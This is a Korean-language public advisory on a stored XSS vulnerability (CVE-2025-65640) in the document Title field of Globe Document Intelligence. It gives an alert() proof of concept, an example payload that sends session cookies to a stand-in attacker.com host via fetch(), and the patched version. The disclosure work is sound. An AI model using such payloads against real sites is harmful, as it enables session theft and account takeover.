
CVE-2025-65640에 대한 공개 권고: Globe Document Intelligence의 저장형 XSS 취약점
Globe Document Intelligence 플랫폼(버전 5.0.0.559)에서 저장형 크로스 사이트 스크립팅(XSS) 취약점이 확인되었습니다. 이 애플리케이션은 새로 생성된 문서의 "Title" 속성에 사용자가 입력한 값을 제대로 정화(sanitize)하거나 인코딩하지 않습니다. 인증된 사용자가 요약 페이지(예: "진행 중인 작업 / 최근")로 이동하면 악성 페이로드가 피해자 브라우저의 컨텍스트에서 반사되어 실행됩니다.
이 취약점을 통해 인증된 공격자는 악성 JavaScript 코드를 서버에 저장할 수 있습니다.
다른 인증된 사용자(관리자 계정 포함)가 영향을 받는 페이지를 열람하면 스크립트가 자동으로 실행됩니다.
아래 개념 증명(PoC)은 무해한 alert()를 사용하여 취약점을 입증하지만, 공격자는 이 결함을 무기화하여 세션 하이재킹(Session Hijacking) 및 계정 탈취(Account Takeover)를 달성할 수 있습니다.
예를 들어 <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>와 같은 페이로드를 주입하면 피해자의 세션 쿠키를 공격자가 통제하는 외부 서버로 은밀히 유출할 수 있습니다.
취약점을 재현하려면 인증된 공격자가 다음 단계를 수행할 수 있습니다:
<script>alert("XSS")</script>공급업체에 따르면 이 취약점은 버전 5.1.0.575에서 해결되었습니다. 이 문제를 해결하려면 Globe Document Intelligence 플랫폼을 버전 5.1.0.575로 업데이트하는 것이 좋습니다.
이 개념 증명(PoC)은 교육 및 연구 목적으로만 제공됩니다. 이 문서에 기술된 정보와 코드는 악의적인 활동이나 시스템 소유자의 명시적인 사전 승인 없이 어떠한 시스템에 대해서도 사용되어서는 안 됩니다. 저자는 어떠한 책임도 지지 않으며, 제공된 자료의 적용으로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다.